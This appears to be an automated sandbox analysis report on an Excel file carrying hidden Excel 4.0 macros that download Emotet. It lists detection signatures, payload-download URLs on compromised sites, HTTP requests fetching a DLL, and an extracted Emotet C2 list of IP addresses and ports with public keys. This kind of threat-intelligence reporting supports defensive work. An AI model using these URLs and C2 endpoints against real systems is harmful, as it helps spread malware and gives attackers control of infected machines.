Windows Analysis Report
opastonline.com.xls

Overview

General Information

Sample Name: opastonline.com.xls
Analysis ID: 562504
MD5: e42ac962bed3fc210b24f8a87161e9b3
SHA1: 0c5bbeb25cd544993acefbc3041b23f99a56a7d5
SHA256: 601121c30531ce26c85a232f1e76df6a0eec591296ff711d45912db421d67a10
Tags: SilentBuilderxls

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection

Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3 Avira URL Cloud: Label: phishing
Source: http://ancyh.xyz Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3 Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/z Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3 Avira URL Cloud: Label: malware
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/ Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/ Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-cont Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/PE3 Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.png Avira URL Cloud: Label: malware
Source: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3 Avira URL Cloud: Label: malware
Source: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/ Avira URL Cloud: Label: phishing
Source: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/ Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/PE3 Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z Avira URL Cloud: Label: phishing
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/ Avira URL Cloud: Label: malware
Source: http://ancyh.xyz/assets/Pcxv1k5/ Avira URL Cloud: Label: malware
Source: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3 Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/ Avira URL Cloud: Label: malware
Source: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3 Avira URL Cloud: Label: malware
Source: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/ Avira URL Cloud: Label: malware
Source: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3 Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3 Avira URL Cloud: Label: malware
Source: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3 Avira URL Cloud: Label: malware
Source: http://michaelcrompton.co.uk/wp-admin/G/ Avira URL Cloud: Label: malware
Source: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3 Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk Avira URL Cloud: Label: malware
Source: http://91.240.118.172/cc/vv/fe.html Avira URL Cloud: Label: malware
Source: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/ Avira URL Cloud: Label: malware
Source: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/ Avira URL Cloud: Label: malware
Source: 13.2.rundll32.exe.2fb0000.24.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 10_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00767E00 FindFirstFileW, 13_2_00767E00

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Source: global traffic DNS query: name: weezual.fr

Networking

Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/G/ HTTP/1.1Host: michaelcrompton.co.ukConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 548864Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 22:03:57 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 22:03:57 GMTContent-Disposition: attachment; filename="aiK6pubP5D.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f4684d41661=1643407437; expires=Fri, 28-Jan-2022 22:04:57 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 22:03:57 GMTX-Frame-Options: SAMEORIGINData Ascii: MZ@
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL
Source: Joe Sandbox View IP Address: 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436666911.00000000002FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.html
Source: opastonline.com.xls.0.dr String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlB
Source: mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.423172440.000000000263D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422785781.0000000002635000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.html
Source: mshta.exe, 00000004.00000002.438112656.0000000000230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.438156977.000000000026E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlngs
Source: mshta.exe, 00000004.00000002.438930744.0000000002AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.htmlr
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.p
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.677149502.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.png
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/cc/vv/fe.pngPE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ancyh.xyz/assets/Pcxv1k5/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/PE3
Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.13.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabq
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-cont
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://journeypropertysolutions.com/cterq/FoPrW8qKzgIj3E8m/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://michaelcrompton.co.uk/wp-admin/G/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.s
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fo
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwso
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/z
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sep.dfwsolar.club/hzh3v/zCUz44VgIrN/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.f
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvN
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weezual.fr/ju9c/twEHJDCvNwGimD/PE3
Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.421158133.0000000002B34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000002.438881833.00000000027CB000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: mshta.exe, 00000004.00000002.439514279.0000000004900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ll
Source: mshta.exe, 00000004.00000003.420844888.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439061631.0000000002B46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436135951.0000000002B46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ode
Source: mshta.exe, 00000004.00000003.421270986.0000000000329000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com=C:
Source: rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 0000000D.00000003.591835259.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676575735.00000000003B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/7m
Source: rundll32.exe, 0000000D.00000003.591845765.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/cdIXMWziBmZNcwbniRwTByQMFFhNrKiB
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hekmat20.com/wp-includes/7/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.p
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PE3
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/
Source: powershell.exe, 00000007.00000002.680276880.00000000038EE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PE3
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: weezual.fr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10012C30 _memset,connect,_strcat,send,recv, 10_2_10012C30
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/G/ HTTP/1.1Host: michaelcrompton.co.ukConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 28 Jan 2022 22:03:54 GMTcontent-type: text/html; charset=iso-8859-1content-length: 261server: Apachex-iplb-request-id: 66818F3D:C00F_D5BA2104:0050_61F4684A_0BFD:14170x-iplb-instance: 31947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
